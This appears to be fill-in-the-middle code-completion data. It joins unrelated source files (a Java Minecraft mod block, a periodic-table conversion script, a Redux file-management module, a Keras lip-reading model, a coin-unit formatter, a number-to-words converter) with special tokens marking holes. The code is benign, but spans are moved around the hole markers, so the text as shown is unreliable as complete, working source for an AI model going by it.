* plutomc_power is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* plutomc_power is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with plutomc_power. If not, see <http://www.gnu.org/licenses/>.
*/
public class BlockCombustionEngine extends BlockMetal implements ITileEntityProvider
{
public static final PropertyDirection FACING = PropertyDirection.create("facing", EnumFacing.Plane.HORIZONTAL);
public BlockCombustionEngine()
{
super(BlockRegistry.Data.COMBUSTION_ENGINE);
setDefaultState(blockState.getBaseState().withProperty(FACING, EnumFacing.NORTH));
}
@Nonnull
@Override
protected BlockStateContainer createBlockState()
{
return new BlockStateContainer(this, FACING);
}
@Nonnull
@Override
public IBlockState getStateForPlacement(World world, BlockPos pos, EnumFacing facing, float hitX, float hitY, float hitZ, int meta, EntityLivingBase placer, EnumHand hand)
{
return getDefaultState().withProperty(FACING, placer.getHorizontalFacing().getOpposite());
}
@Nonnull
@Override
public IBlockState getStateFromMeta(int meta)
{
return getDefaultState().withProperty(FACING, EnumFacing.getFront(meta));
}
@Override
public int getMetaFromState(IBlockState state)
{
return state.getValue(FACING).getIndex();
}
@Nullable
@Override
public TileEntity createNewTileEntity(World worldIn, int meta)
{<|fim▁hole|> return new TileEntityCombustionEngine();
}
@Override
public void breakBlock(World worldIn, BlockPos pos, IBlockState state)
{
TileEntity tileEntity = worldIn.getTileEntity(pos);
if (tileEntity instanceof TileEntityCombustionEngine)
{
InventoryHelper.dropInventoryItems(worldIn, pos, (TileEntityCombustionEngine) tileEntity);
worldIn.updateComparatorOutputLevel(pos, this);
}
super.breakBlock(worldIn, pos, state);
}
@Override
public boolean onBlockActivated(World worldIn, BlockPos pos, IBlockState state, EntityPlayer playerIn, EnumHand hand, EnumFacing facing, float hitX, float hitY, float hitZ)
{
if (!worldIn.isRemote)
{
playerIn.openGui(Power.instance(), GuiHandler.ENGINE_COMBUSTION, worldIn, pos.getX(), pos.getY(), pos.getZ());
}
return true;
}
@Override
public void onBlockPlacedBy(World worldIn, BlockPos pos, IBlockState state, EntityLivingBase placer, ItemStack stack)
{
TileEntity tileEntity = worldIn.getTileEntity(pos);
if (tileEntity instanceof TileEntityCombustionEngine)
{
((TileEntityCombustionEngine) tileEntity).setCustomName(stack.getDisplayName());
}
}
}<|fim▁end|>
| |
<|file_name|>update_pt_data.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Developer script to convert yaml periodic table to json format.
Created on Nov 15, 2011
'''
from __future__ import division
import json
import ruamel.yaml as yaml
import re
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "Nov 15, 2011"
def test_yaml():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
print(data)
def test_json():
with open('periodic_table.json', 'r') as f:
data = json.load(f)
print(data)
def parse_oxi_state():
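    # scrape oxidation states out of the saved HTML table rows; <b>-wrapped entries mark the common oxidation states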
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('oxidation_states.txt', 'r')
oxidata = f.read()
f.close()
oxidata = re.sub('[\n\r]', '', oxidata)
patt = re.compile('<tr>(.*?)</tr>', re.MULTILINE)
for m in patt.finditer(oxidata):
line = m.group(1)
line = re.sub('</td>', '', line)
line = re.sub('(<td>)+', '<td>', line)
line = re.sub('</*a[^>]*>', '', line)
el = None
oxistates = []
common_oxi = []
for tok in re.split('<td>', line.strip()):
m2 = re.match("<b>([A-Z][a-z]*)</b>", tok)
if m2:
el = m2.group(1)
else:
m3 = re.match("(<b>)*([\+\-]\d)(</b>)*", tok)
if m3:
oxistates.append(int(m3.group(2)))
if m3.group(1):
common_oxi.append(int(m3.group(2)))
if el in data:
del data[el]['Max oxidation state']
del data[el]['Min oxidation state']
del data[el]['Oxidation_states']
del data[el]['Common_oxidation_states']
data[el]['Oxidation states'] = oxistates
data[el]['Common oxidation states'] = common_oxi
else:
print(el)
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
def parse_ionic_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('ionic_radii.csv', 'r')
radiidata = f.read()
f.close()
radiidata = radiidata.split("\r")
header = radiidata[0].split(",")
for i in range(1, len(radiidata)):
line = radiidata[i]
toks = line.strip().split(",")
suffix = ""
name = toks[1]
if len(name.split(" ")) > 1:
suffix = "_" + name.split(" ")[1]
el = toks[2]
ionic_radii = {}
for j in range(3, len(toks)):
m = re.match("^\s*([0-9\.]+)", toks[j])
if m:
ionic_radii[int(header[j])] = float(m.group(1))
if el in data:
data[el]['Ionic_radii' + suffix] = ionic_radii
if suffix == '_hs':
data[el]['Ionic_radii'] = ionic_radii
else:
print(el)<|fim▁hole|> with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
def parse_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('radii.csv', 'r')
radiidata = f.read()
f.close()
radiidata = radiidata.split("\r")
header = radiidata[0].split(",")
for i in range(1, len(radiidata)):
line = radiidata[i]
toks = line.strip().split(",")
el = toks[1]
try:
atomic_radii = float(toks[3]) / 100
except:
atomic_radii = toks[3]
try:
atomic_radii_calc = float(toks[4]) / 100
except:
atomic_radii_calc = toks[4]
try:
vdw_radii = float(toks[5]) / 100
except:
vdw_radii = toks[5]
if el in data:
data[el]['Atomic radius'] = atomic_radii
data[el]['Atomic radius calculated'] = atomic_radii_calc
data[el]['Van der waals radius'] = vdw_radii
else:
print(el)
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def update_ionic_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
for el, d in data.items():
if "Ionic_radii" in d:
d["Ionic radii"] = {k: v / 100
for k, v in d["Ionic_radii"].items()}
del d["Ionic_radii"]
if "Ionic_radii_hs" in d:
d["Ionic radii hs"] = {k: v / 100
for k, v in d["Ionic_radii_hs"].items()}
del d["Ionic_radii_hs"]
if "Ionic_radii_ls" in d:
d["Ionic radii ls"] = {k: v / 100
for k, v in d["Ionic_radii_ls"].items()}
del d["Ionic_radii_ls"]
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def parse_shannon_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
from openpyxl import load_workbook
import collections
wb = load_workbook('Shannon Radii.xlsx')
print(wb.get_sheet_names())
sheet = wb["Sheet1"]
i = 2
radii = collections.defaultdict(dict)
while sheet["E%d" % i].value:
if sheet["A%d" % i].value:
el = sheet["A%d" % i].value
if sheet["B%d" % i].value:
charge = int(sheet["B%d" % i].value)
radii[el][charge] = dict()
if sheet["C%d" % i].value:
cn = sheet["C%d" % i].value
if cn not in radii[el][charge]:
radii[el][charge][cn] = dict()
if sheet["D%d" % i].value is not None:
spin = sheet["D%d" % i].value
else:
spin = ""
# print("%s - %d - %s" % (el, charge, cn))
radii[el][charge][cn][spin] = {
"crystal_radius": float(sheet["E%d" % i].value),
"ionic_radius": float(sheet["F%d" % i].value),
}
i += 1
for el in radii.keys():
if el in data:
data[el]["Shannon radii"] = dict(radii[el])
with open('periodic_table.yaml', 'w') as f:
yaml.safe_dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def gen_periodic_table():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
if __name__ == "__main__":
parse_shannon_radii()
#gen_periodic_table()<|fim▁end|>
| |
<|file_name|>files.js<|end_file_name|><|fim▁begin|>import { apiGet, apiPut, apiDelete } from 'utils/api'
import { flashError, flashSuccess } from 'utils/flash'
import { takeLatest, takeEvery, call, put, select } from 'redux-saga/effects'
import { filter, find, without, omit } from 'lodash'
import { filesUrlSelector } from 'ducks/app'
import { makeUploadsSelector } from 'ducks/uploads'
import { makeFiltersQuerySelector } from 'ducks/filters'
import { makeSelectedFileIdsSelector } from 'ducks/filePlacements'
// Constants
const GET_FILES = 'files/GET_FILES'
const GET_FILES_SUCCESS = 'files/GET_FILES_SUCCESS'
const UPLOADED_FILE = 'files/UPLOADED_FILE'
const THUMBNAIL_GENERATED = 'files/THUMBNAIL_GENERATED'
const DELETE_FILE = 'files/DELETE_FILE'
const DELETE_FILE_FAILURE = 'files/DELETE_FILE_FAILURE'
const UPDATE_FILE = 'files/UPDATE_FILE'
export const UPDATE_FILE_SUCCESS = 'files/UPDATE_FILE_SUCCESS'
export const UPDATE_FILE_FAILURE = 'files/UPDATE_FILE_FAILURE'
const UPDATED_FILES = 'files/UPDATED_FILES'
const REMOVED_FILES = 'files/REMOVED_FILES'
const CHANGE_FILES_PAGE = 'files/CHANGE_FILES_PAGE'
const MASS_SELECT = 'files/MASS_SELECT'
const MASS_DELETE = 'files/MASS_DELETE'
const MASS_CANCEL = 'files/MASS_CANCEL'
// Actions
export function getFiles (fileType, filesUrl, query = '') {
return { type: GET_FILES, fileType, filesUrl, query }
}
export function getFilesSuccess (fileType, records, meta) {
return { type: GET_FILES_SUCCESS, fileType, records, meta }
}
export function uploadedFile (fileType, file) {
return { type: UPLOADED_FILE, fileType, file }
}
export function thumbnailGenerated (fileType, temporaryUrl, url) {
return { type: THUMBNAIL_GENERATED, fileType, temporaryUrl, url }
}
export function updatedFiles (fileType, files) {
return { type: UPDATED_FILES, fileType, files }
}
export function updateFile (fileType, filesUrl, file, attributes) {
return { type: UPDATE_FILE, fileType, filesUrl, file, attributes }
}
export function deleteFile (fileType, filesUrl, file) {
return { type: DELETE_FILE, fileType, filesUrl, file }
}
export function deleteFileFailure (fileType, file) {
return { type: DELETE_FILE_FAILURE, fileType, file }
}
export function removedFiles (fileType, ids) {
return { type: REMOVED_FILES, fileType, ids }
}
export function updateFileSuccess (fileType, file, response) {
return { type: UPDATE_FILE_SUCCESS, fileType, file, response }
}
export function updateFileFailure (fileType, file) {
return { type: UPDATE_FILE_FAILURE, fileType, file }
}
export function changeFilesPage (fileType, filesUrl, page) {
return { type: CHANGE_FILES_PAGE, fileType, filesUrl, page }
}
export function massSelect (fileType, file, select) {
return { type: MASS_SELECT, fileType, file, select }
}
export function massDelete (fileType) {
return { type: MASS_DELETE, fileType }
}
export function massCancel (fileType) {
return { type: MASS_CANCEL, fileType }
}
// Sagas
function * getFilesPerform (action) {
try {
const filesUrl = `${action.filesUrl}?${action.query}`
const response = yield call(apiGet, filesUrl)
yield put(getFilesSuccess(action.fileType, response.data, response.meta))
} catch (e) {
flashError(e.message)
}
}
function * getFilesSaga () {
// takeLatest automatically cancels any saga task started previously if it's still running
yield takeLatest(GET_FILES, getFilesPerform)
}
function * updateFilePerform (action) {
try {
const { file, filesUrl, attributes } = action
const fullUrl = `${filesUrl}/${file.id}`
const data = {
file: {
id: file.id,
attributes
}
}
const response = yield call(apiPut, fullUrl, data)
yield put(updateFileSuccess(action.fileType, action.file, response.data))
} catch (e) {
flashError(e.message)
yield put(updateFileFailure(action.fileType, action.file))
}
}
function * updateFileSaga () {
yield takeEvery(UPDATE_FILE, updateFilePerform)
}
function * changeFilesPagePerform (action) {
try {
const filtersQuery = yield select(makeFiltersQuerySelector(action.fileType))
let query = `page=${action.page}`
if (filtersQuery) {
query = `${query}&${filtersQuery}`
}
yield put(getFiles(action.fileType, action.filesUrl, query))
} catch (e) {
flashError(e.message)
}
}
function * changeFilesPageSaga () {
yield takeLatest(CHANGE_FILES_PAGE, changeFilesPagePerform)
}
function * massDeletePerform (action) {
try {
const { massSelectedIds } = yield select(makeMassSelectedIdsSelector(action.fileType))
const filesUrl = yield select(filesUrlSelector)
const fullUrl = `${filesUrl}/mass_destroy?ids=${massSelectedIds.join(',')}`
const res = yield call(apiDelete, fullUrl)
if (res.error) {
flashError(res.error)
} else {
flashSuccess(res.data.message)
yield put(removedFiles(action.fileType, massSelectedIds))
yield put(massCancel(action.fileType))
}
} catch (e) {
flashError(e.message)
}
}
function * massDeleteSaga () {
yield takeLatest(MASS_DELETE, massDeletePerform)
}
function * deleteFilePerform (action) {
try {
const res = yield call(apiDelete, `${action.filesUrl}/${action.file.id}`)
if (res.error) {
flashError(res.error)
} else {
yield put(removedFiles(action.fileType, [action.file.id]))
}
} catch (e) {
flashError(e.message)
}
}
function * deleteFileSaga () {
yield takeLatest(DELETE_FILE, deleteFilePerform)
}
export const filesSagas = [
getFilesSaga,
updateFileSaga,
changeFilesPageSaga,
massDeleteSaga,
deleteFileSaga
]
// Selectors
export const makeFilesStatusSelector = (fileType) => (state) => {
return {
loading: state.files[fileType] && state.files[fileType].loading,
loaded: state.files[fileType] && state.files[fileType].loaded,
    massSelecting: state.files[fileType] && state.files[fileType].massSelectedIds.length > 0
}
}
export const makeFilesLoadedSelector = (fileType) => (state) => {
return state.files[fileType] && state.files[fileType].loaded
}
export const makeMassSelectedIdsSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return {
massSelectedIds: base.massSelectedIds,
massSelectedIndestructibleIds: base.massSelectedIndestructibleIds
}
}
export const makeFilesSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
const selected = base.massSelectedIds
return base.records.map((file) => {
if (file.id && selected.indexOf(file.id) !== -1) {
return { ...file, massSelected: true }
} else {
return file
}
})
}
export const makeFilesForListSelector = (fileType) => (state) => {
const uploads = makeUploadsSelector(fileType)(state)
let files
if (uploads.uploadedIds.length) {
files = makeFilesSelector(fileType)(state).map((file) => {
if (uploads.uploadedIds.indexOf(file.id) === -1) {
return file
} else {
return { ...file, attributes: { ...file.attributes, freshlyUploaded: true } }
}
})
} else {
files = makeFilesSelector(fileType)(state)
}
return [
...Object.values(uploads.records).map((upload) => ({ ...upload, attributes: { ...upload.attributes, uploading: true } })),
...files
]
}
export const makeRawUnselectedFilesForListSelector = (fileType, selectedIds) => (state) => {
const all = makeFilesForListSelector(fileType)(state)
return filter(all, (file) => selectedIds.indexOf(String(file.id)) === -1)
}
export const makeUnselectedFilesForListSelector = (fileType) => (state) => {
const all = makeFilesForListSelector(fileType)(state)
const selectedIds = makeSelectedFileIdsSelector(fileType)(state)
return filter(all, (file) => selectedIds.indexOf(String(file.id)) === -1)
}
export const makeFilesPaginationSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return base.pagination
}
export const makeFilesReactTypeSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return base.reactType
}
export const makeFilesReactTypeIsImageSelector = (fileType) => (state) => {
return makeFilesReactTypeSelector(fileType)(state) === 'image'
}
// State
const defaultFilesKeyState = {
loading: false,
loaded: false,
records: [],
massSelectedIds: [],
massSelectedIndestructibleIds: [],
reactType: 'document',
pagination: {
page: null,
pages: null
}
}
const initialState = {}
// Reducer
function filesReducer (rawState = initialState, action) {
const state = rawState
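  // lazily seed per-fileType state the first time an action references that file type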
if (action.fileType && !state[action.fileType]) {
state[action.fileType] = { ...defaultFilesKeyState }
}
switch (action.type) {
case GET_FILES:
return {
...state,
[action.fileType]: {
...state[action.fileType],
loading: true
}
}
case GET_FILES_SUCCESS:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: action.records,
loading: false,
loaded: true,
pagination: omit(action.meta, ['react_type']),
reactType: action.meta.react_type
}
}
case UPLOADED_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: [action.file, ...state[action.fileType].records]
}
}
case THUMBNAIL_GENERATED: {
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.attributes.thumb !== action.temporaryUrl) return record
return {
...record,
attributes: {
...record.attributes,
thumb: action.url
}
}
})
}
}
}
case UPDATE_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return {
...record,
attributes: {
...record.attributes,
...action.attributes,
updating: true
}
}
} else {
return record
}
})
}
}
case UPDATE_FILE_SUCCESS:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.response.id) {
return action.response
} else {
return record
}
})
}
}
case UPDATE_FILE_FAILURE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return { ...action.file }
} else {
return record
}
})
}
}
case UPDATED_FILES:<|fim▁hole|> return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
const found = find(action.files, { id: record.id })
return found || record
})
}
}
case MASS_SELECT: {
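      // files that already have placements are additionally tracked as indestructible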
if (!action.file.id) return state
let massSelectedIds = state[action.fileType].massSelectedIds
let massSelectedIndestructibleIds = state[action.fileType].massSelectedIndestructibleIds
if (action.select) {
massSelectedIds = [...massSelectedIds, action.file.id]
if (action.file.attributes.file_placements_size) {
massSelectedIndestructibleIds = [...massSelectedIndestructibleIds, action.file.id]
}
} else {
massSelectedIds = without(massSelectedIds, action.file.id)
if (action.file.attributes.file_placements_size) {
massSelectedIndestructibleIds = without(massSelectedIndestructibleIds, action.file.id)
}
}
return {
...state,
[action.fileType]: {
...state[action.fileType],
massSelectedIds,
massSelectedIndestructibleIds
}
}
}
case MASS_CANCEL:
return {
...state,
[action.fileType]: {
...state[action.fileType],
massSelectedIds: []
}
}
case REMOVED_FILES: {
const originalLength = state[action.fileType].records.length
const records = state[action.fileType].records.filter((record) => action.ids.indexOf(record.id) === -1)
return {
...state,
[action.fileType]: {
...state[action.fileType],
records,
pagination: {
...state[action.fileType].pagination,
to: records.length,
count: state[action.fileType].pagination.count - (originalLength - records.length)
}
}
}
}
case DELETE_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return {
...record,
_destroying: true
}
} else {
return record
}
})
}
}
case DELETE_FILE_FAILURE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return { ...action.file }
} else {
return record
}
})
}
}
default:
return state
}
}
export default filesReducer<|fim▁end|>
| |
<|file_name|>example0.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
import threading
def worker():<|fim▁hole|>
for i in range(8):
threading.Thread(target = worker).start()<|fim▁end|>
|
print('new worker')
|
<|file_name|>time_dis_cnn.py<|end_file_name|><|fim▁begin|>"""
Multiple stacked LSTM implementation on the lip movement data.
Akm Ashiquzzaman
[email protected]
Fall 2016
"""
from __future__ import print_function
import numpy as np
np.random.seed(1337)
#random seed fixing for reproducibility
#data load & preprocessing
X_train = np.load('../data/videopart43.npy').astype('float32')
Y_train = np.load('../data/audiopart43.npy').astype('float32')<|fim▁hole|>X_train = X_train/255
Y_train = Y_train/32767
X_train = X_train.reshape((826,13,1,53,53)).astype('float32')
Y_train = Y_train.reshape((826,13*4702)).astype('float32')
from keras.models import Sequential
from keras.layers import Dense,Activation,Dropout,TimeDistributed,LSTM,Bidirectional
from keras.layers import Convolution2D,Flatten,MaxPooling2D
import time
print("Building Model.....")
model_time = time.time()
model = Sequential()
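# per-frame CNN (TimeDistributed) feeding stacked bidirectional stateful LSTMs, then dense layers producing the audio frames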
model.add(TimeDistributed(Convolution2D(64, 3, 3,border_mode='valid'),batch_input_shape=(14,13,1,53,53),input_shape=(13,1,53,53)))
model.add(Activation('tanh'))
model.add(Dropout(0.25))
model.add(TimeDistributed(Convolution2D(32, 2, 2, border_mode='valid')))
model.add(Activation('tanh'))
model.add(TimeDistributed(Flatten()))
model.add(Bidirectional(LSTM(256,return_sequences=True,stateful=True)))
model.add(Dropout(0.20))
model.add(Bidirectional(LSTM(128,return_sequences=True,stateful=True)))
model.add(Dropout(0.20))
model.add((LSTM(64,stateful=True)))
model.add(Dropout(0.20))
model.add((Dense(512)))
model.add(Activation('tanh'))
model.add(Dropout(0.5))
model.add((Dense(13*4702)))
model.add(Activation('tanh'))
model.compile(loss='mse', optimizer='rmsprop', metrics=['accuracy'])
#checkpoint import
from keras.callbacks import ModelCheckpoint
from os.path import isfile, join
#weight file name
weight_file = '../weights/time-dis-cnn_weight.h5'
#loading previous weight file for resuming training
if isfile(weight_file):
model.load_weights(weight_file)
#weight-checkmark
checkpoint = ModelCheckpoint(weight_file, monitor='acc', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint]
print("model compile time: "+str(time.time()-model_time)+'s')
# fit the model
model.fit(X_train,Y_train, nb_epoch=1, batch_size=14,callbacks=callbacks_list)
pred = model.predict(X_train,batch_size=14,verbose=1)
pred = pred*32767
pred = pred.reshape(826*13,4702)
print('pred shape',pred.shape)
print('pred dtype',pred.dtype)
np.save('../predictions/pred-time-cnn.npy',pred)<|fim▁end|>
|
#normalizing data
|
<|file_name|>bitcoinunits.cpp<|end_file_name|><|fim▁begin|>#include "bitcoinunits.h"
#include <QStringList>
BitcoinUnits::BitcoinUnits(QObject *parent):
QAbstractListModel(parent),
unitlist(availableUnits())
{
}
QList<BitcoinUnits::Unit> BitcoinUnits::availableUnits()
{
QList<BitcoinUnits::Unit> unitlist;
unitlist.append(BTC);
unitlist.append(mBTC);
unitlist.append(uBTC);
return unitlist;
}
bool BitcoinUnits::valid(int unit)
{
switch(unit)
{
case BTC:
case mBTC:
case uBTC:
return true;
default:
return false;
}
}
QString BitcoinUnits::name(int unit)
{
switch(unit)
{
case BTC: return QString("LTCC");
case mBTC: return QString("mLTCC");
case uBTC: return QString::fromUtf8("μLTCC");
default: return QString("???");
}
}
QString BitcoinUnits::description(int unit)
{
switch(unit)
{
case BTC: return QString("Litecoin Classic");
case mBTC: return QString("milli Litecoin Classic (1 / 1,000)");
case uBTC: return QString("micro Litecoin Classic (1 / 1,000,000)");
default: return QString("???");
}
}
//a single unit (.00000001) of Litecoin Classic is called a "wander."
qint64 BitcoinUnits::factor(int unit)
{
switch(unit)
{
case BTC: return 100000000;
case mBTC: return 100000;
case uBTC: return 100;
default: return 100000000;
}
}
int BitcoinUnits::amountDigits(int unit)
{
switch(unit)
{
case BTC: return 8; // 21,000,000 (# digits, without commas)
case mBTC: return 11; // 21,000,000,000
case uBTC: return 14; // 21,000,000,000,000
default: return 0;
}
}
int BitcoinUnits::decimals(int unit)
{
switch(unit)
{
case BTC: return 8;
case mBTC: return 5;
case uBTC: return 2;
default: return 0;
}
}
QString BitcoinUnits::format(int unit, qint64 n, bool fPlus)
{
// Note: not using straight sprintf here because we do NOT want
// localized number formatting.
if(!valid(unit))
return QString(); // Refuse to format invalid unit
qint64 coin = factor(unit);
int num_decimals = decimals(unit);
qint64 n_abs = (n > 0 ? n : -n);
qint64 quotient = n_abs / coin;
qint64 remainder = n_abs % coin;
QString quotient_str = QString::number(quotient);
QString remainder_str = QString::number(remainder).rightJustified(num_decimals, '0');
// Right-trim excess 0's after the decimal point
int nTrim = 0;
for (int i = remainder_str.size()-1; i>=2 && (remainder_str.at(i) == '0'); --i)
++nTrim;
remainder_str.chop(nTrim);
if (n < 0)
quotient_str.insert(0, '-');
else if (fPlus && n > 0)
quotient_str.insert(0, '+');
return quotient_str + QString(".") + remainder_str;
}
QString BitcoinUnits::formatWithUnit(int unit, qint64 amount, bool plussign)
{
return format(unit, amount, plussign) + QString(" ") + name(unit);
}
bool BitcoinUnits::parse(int unit, const QString &value, qint64 *val_out)
{
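    // convert a user-entered decimal amount string into the smallest-unit integer amount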
if(!valid(unit) || value.isEmpty())
return false; // Refuse to parse invalid unit or empty string
int num_decimals = decimals(unit);
QStringList parts = value.split(".");
if(parts.size() > 2)
{
return false; // More than one dot
}
QString whole = parts[0];
QString decimals;
if(parts.size() > 1)
{
decimals = parts[1];
}
if(decimals.size() > num_decimals)
{
return false; // Exceeds max precision
}
bool ok = false;
QString str = whole + decimals.leftJustified(num_decimals, '0');
if(str.size() > 18)
{
return false; // Longer numbers will exceed 63 bits
}
qint64 retvalue = str.toLongLong(&ok);
if(val_out)
{
*val_out = retvalue;
}
return ok;
}
int BitcoinUnits::rowCount(const QModelIndex &parent) const
{
Q_UNUSED(parent);
return unitlist.size();
}<|fim▁hole|> if(row >= 0 && row < unitlist.size())
{
Unit unit = unitlist.at(row);
switch(role)
{
case Qt::EditRole:
case Qt::DisplayRole:
return QVariant(name(unit));
case Qt::ToolTipRole:
return QVariant(description(unit));
case UnitRole:
return QVariant(static_cast<int>(unit));
}
}
return QVariant();
}<|fim▁end|>
|
QVariant BitcoinUnits::data(const QModelIndex &index, int role) const
{
int row = index.row();
|
<|file_name|>base.py<|end_file_name|><|fim▁begin|>from decimal import Decimal
map_ones = {
0: "",
1: "One",
2: "Two",
3: "Three",
4: "Four",
5: "Five",
6: "Six",
7: "Seven",
8: "Eight",
9: "Nine",
}
map_tens = {
10: "Ten",
11: "Eleven",
12: "Twelve",
13: "Thirteen",
14: "Fourteen",
15: "Fifteen",
16: "Sixteen",
17: "Seventeen",
18: "Eighteen",
19: "Nineteen",
}
map_tenths = {
2: "Twenty",
3: "Thirty",
4: "Forty",
5: "Fifty",
6: "Sixty",
7: "Seventy",
8: "Eighty",
9: "Ninety",
}
def convert_ones(num):
"""
Convert ones number to word.
Parameters
----------
num: int
Single digit integer number
"""
if len(str(num)) > 1:
raise Exception("Must have at most 1 digit")
num = int(num)
return map_ones[num]
def convert_tenths(num):
"""
Convert tenths number to word.
Parameters
----------
num: int
Double digit integer number
"""
if len(str(num)) > 2:
raise Exception("Must have at most 2 digits")
num = int(num)
bases = ""
# less than 10
if num < 10:
return map_ones[num]
# 10-19
if 10 <= num < 20:
return map_tens[num]
# 20-99
first_num = map_tenths[int(str(num)[0])]
second_num = map_ones[int(str(num)[1])]
if not second_num:
return first_num
return first_num + " " + second_num
def get_dollar(hundredth, tenth, one, base):
"""
Given hundredth, tenth and one integer number for base (e.g. Billion, Million), return converted word
Parameters
----------
hundredth: int
Hundredth number
tenth: int
Tenth number
one: int
One number
base: string
Base value
"""
dollar_word = ""
if hundredth:
dollar_word += "{0} Hundred".format(convert_ones(hundredth))
# Add "And" if there's numbers after hundredths
if hundredth and (tenth or one):
dollar_word += " And "
if tenth or one:
dollar_word += "{0}".format(convert_tenths(int(str(tenth) + str(one))))
if base:
dollar_word += " {0}".format(base)
return dollar_word
def get_billion(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Billion")
def get_million(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Million")
def get_thousand(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Thousand")
def get_one(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "")
def get_cent(tenth, one):
"""
Given tenth and one integer number (for cent), return converted word
Parameters
----------
tenth: int
Tenth number
one: int
One number
"""
cent_word = ""
if tenth or one:
cent_word += "{0}".format(convert_tenths(int(str(tenth) + str(one))))
if cent_word:
cent_word = "Cents {0} ".format(cent_word)
return cent_word
def get_index(val, index, default=0):
try:
return val[index]
except IndexError:
return default
def extract(num):
"""
Given a max 3 character number, extract and return hundredth, tenth and one value
Parameters
----------
num: string
Number in string
Return
----------
hundredth: int
Hundredth number
tenth: int
Tenth number
one: int
One number
"""
hundredth = 0
tenth = 0
one = 0
if len(num) == 3:
hundredth, tenth, one = int(num[0]), int(num[1]), int(num[2])
if len(num) == 2:
tenth, one = int(num[0]), int(num[1])
if len(num) == 1:
one = int(num[0])
return hundredth, tenth, one
def generate_dollar_word(num):
"""
Generate word for dollar
Parameters
----------
num: string
Dollar number in string
"""
word = ""
# at least 1 billion
if len(num) > 9:
billion_num = int(num[0:(len(num)-9)])
num = str(int(num) - (billion_num*int(1e9)))
hundredth, tenth, one = extract(str(billion_num))
word += "{0} ".format(get_billion(hundredth, tenth, one))
# at least 1 million
if len(num) > 6:
million_num = int(num[0:(len(num)-6)])
num = str(int(num) - (million_num*int(1e6)))
hundredth, tenth, one = extract(str(million_num))
word += "{0} ".format(get_million(hundredth, tenth, one))
# at least 1 thousand
if len(num) > 3:
thousand_num = int(num[0:(len(num)-3)])
num = str(int(num) - (thousand_num*int(1e3)))
hundredth, tenth, one = extract(str(thousand_num))
word += "{0} ".format(get_thousand(hundredth, tenth, one))
# at least 1
if int(num) and len(num) > 0:
one_num = int(num[0:len(num)])<|fim▁hole|>
def generate_cent_word(num):
"""
Generate word for cent
Parameters
----------
num: string
Cent number in string
"""
word = ""
hundredth, tenth, one = extract(str(num))
word += get_cent(tenth, one)
return word
def validate(amt):
# amt MUST be in string to avoid accidental round off
if Decimal(amt) > Decimal(str(1e11)):
raise Exception("Please enter an amount smaller than 100 billion")
if len(get_index(amt.split('.'), 1, "")) > 2:
raise Exception("Please enter an amount within 2 decimal place")
def generate_word(amt):
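    # e.g. generate_word("1234.56") -> "One Thousand Two Hundred And Thirty Four And Cents Fifty Six Only"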
# remove commas and spaces from word
amt = amt.replace(",", "").replace(" ", "")
validate(amt)
amt = '{0:.2f}'.format(Decimal(amt))
amt_list = amt.split('.')
dollar_amt = get_index(amt_list, 0)
cent_amt = get_index(amt_list, 1)
dollar_word = generate_dollar_word(dollar_amt)
cent_word = generate_cent_word(cent_amt)
if not dollar_word:
return cent_word + "Only"
if not cent_word:
return dollar_word + "Only"
return dollar_word + "And " + cent_word + "Only"<|fim▁end|>
|
num = str(int(num) - one_num)
hundredth, tenth, one = extract(str(one_num))
word += "{0} ".format(get_one(hundredth, tenth, one))
return word
|
<|file_name|>ServletContainerInitializerImpl.java<|end_file_name|><|fim▁begin|>package com.example;
import java.util.Set;
<|fim▁hole|>import javax.servlet.ServletException;
